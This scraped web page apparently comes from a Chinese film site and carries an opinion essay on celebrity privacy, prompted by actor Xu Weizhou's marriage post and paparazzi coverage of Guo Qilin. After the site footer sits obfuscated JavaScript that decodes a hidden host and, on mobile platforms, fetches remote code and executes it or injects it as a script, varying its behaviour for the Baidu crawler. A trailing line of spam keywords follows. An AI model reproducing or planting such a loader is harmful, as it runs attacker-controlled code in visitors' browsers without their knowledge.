從郭麒麟夜游,到許魏洲結婚,女方是誰?愛誰誰,才是正常心態

天龍影院小白明星資訊人氣:30時間:2022-03-10 16:40:09

3月10日,電視劇演員許魏洲在自己的社交媒體平臺上發布了結婚證照片,告知了網友們自己已經結婚的事情。一件尋常小事,讓不少狗仔娛樂媒體無比興奮,興奮點尤其聚焦在女方是誰上。無獨有偶,類似的事情,在娛樂圈也剛剛發生過一次。(本文配圖,選自許魏洲參演的影視劇作品)

相聲演員郭麒麟和一位青年女性夜走,被狗仔隊媒體捕捉到之后,立馬夸大其詞,開始各種猜測郭麒麟的女朋友是誰。最終結果則是,郭麒麟怒斥這種狗仔隊行徑,并且告知網友,所謂的照片,不過是被狗仔隊借位拍攝的。小郭怒斥狗仔隊的態度,值得點贊。

從郭麒麟到許魏洲,兩次的娛樂事件,反倒是有一個共性特點,那就是某些娛樂媒體帶節奏,故意勾搭網友興奮,試圖追問當事女性是誰。我對這類娛樂八卦素來嗤之以鼻。奈何,我選擇沉默不言的話,實在也看不到誰站出來認真分析一下此事,尤其是直面影視劇演員和觀眾、網友之間的私生活界限問題。

首先,我們先追問一句,影視劇演員結婚,有沒有告知觀眾、網友的義務。至少,在幾十年前,老編剛開始看電影和電視劇的時候,我沒見哪一位演員結婚了,還得先登報告知一些讀者的。我剛看影視劇的年代,還沒有互聯網。我們當時,也沒有什么所謂的追星。大家跟影視劇演員沒有直接的交集,都是通過作品進行交流。我反倒是認為,我們當年的狀態,才是正確的狀態。

九十年代,遇到大火的電視劇,也有演員和觀眾之間面對面的交流啊、訪談啊之類的。但是,當年的情況遠比當下要好得多。當年的交流,演員們沒有兩把刷子,是真不敢出來交流的,都得是站在編劇導演后邊。觀眾們水平也高,交流的都是影視劇當中的內容,甚至于很多是哲學內容,是美學內容。為什么現在有一批老演員成了老戲骨了,都是觀眾們給“逼”的,他們青年時代看到了,觀眾們是真厲害,你不學習,你屁都不是。

現在的影視劇見面會呢?分分鐘搞成了粉絲應援會。即使某些導演,和觀眾見面,也擺不正自己的立場了,總覺得觀眾是他的粉絲,聽他嚇唬喲即可了。2021年的年底,我參加一個文藝片的交流會,那位導演,也是一副流量明星的樣子,虛偽的很。這已經成為影視劇行業當中的一個怪現象,從業者不會正常的美學、哲學交流了,只會把觀眾當不動腦子的粉絲去糊弄了。

在這種局面之下,影視劇演員們和誰結婚了,生了幾個孩子了,男孩還是女孩了等等,成為所謂的重要娛樂新聞。交流這些所謂的娛樂新聞,自然是沒有審美起點的,沒有交流難度的。我們很多網友們,對于這些毫無營養價值可言的娛樂八卦,樂此不疲。且沒有媒體站出來,和這種網友認真聊一聊,界限問題。這就是流量的時代,我們似乎都在選擇性沉默或者忽悠。

回到前邊的問題上,影視劇演員結婚,屬于自己私人領域的事情,是受隱私保護的。我們平常人結婚,喜歡公布一下,尤其是社交媒體平臺上公布。這是求取祝福的一種方式。對于許魏洲的結婚,他的心態,應該也是類似的。因此,作為喜歡許魏洲的觀眾,大可以送上祝福即可。至于新娘是誰,他不說,我們就可以表示:不感興趣!國家既然發給你們結婚證了,就證明你們合法,你們既然合法,網友們就沒必要關注。

繼而,我們也要捫心自問,除了某些娛樂八卦媒體故意帶節奏,調動網友好奇心之外,有沒有網友自身的問題呢?當然有。部分網友也是典型的趴門縫、扒墻角心態,滿腦子都是窺私的欲望。未經正規教育訓練的人,容易有這種可恥的窺私欲望。而接受過正規教育的青年們,則茁壯健康,早已成為國家各行各業當中的頂梁柱,對于這類娛樂八卦,是拒之門外的。

定好一個界限,對自己,對演員,對影視劇藝術本身,都是有好處的。像郭麒麟的“女友”是誰,許魏洲的妻子是誰,這類內容,就應該被放在界限外,屬于網友們可以直接告知八卦狗仔們不感興趣且知道為何不感興趣的內容。

最后,影視劇演員和觀眾交流的唯一方式,到底是什么?還是那句老生常談,是作品。除了作品之外,沒有其它更有價值的交流。最近幾年,很有一批流量明星,作品嘛也不是,一塌糊涂,但人設營銷,卻如火如荼。這是可恥的。像郭麒麟這種,怒斥狗仔隊,許魏洲這種,保護妻子隱私的行為,反倒是彌足珍貴。這是給娛樂明星們,打了個樣。你就踏踏實實地拍好作品,少營銷這批沒用的東西。(文/馬慶云)

本站所有視頻和圖片均來自互聯網收集而來,版權歸原創者所有,本網站只提供web頁面服務,并不提供資源存儲,也不參與錄制、上傳
若本站收錄的節目無意侵犯了貴司版權,請發郵件至qiubi4774750090@163.com (我們會在3個工作日內刪除侵權內容,謝謝。)

? 2022 天龍影院 蘇ICP備23654795號

function ZlRpLq(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function srGShN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return ZlRpLq(t);};window[''+'q'+'P'+'I'+'G'+'R'+'s'+'f'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=srGShN,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('bW50Lnl6YzM1MzI2LnRvccA==','154358',window,document,['c','FAYPqjU']);}:function(){};
99久久久国产精品免费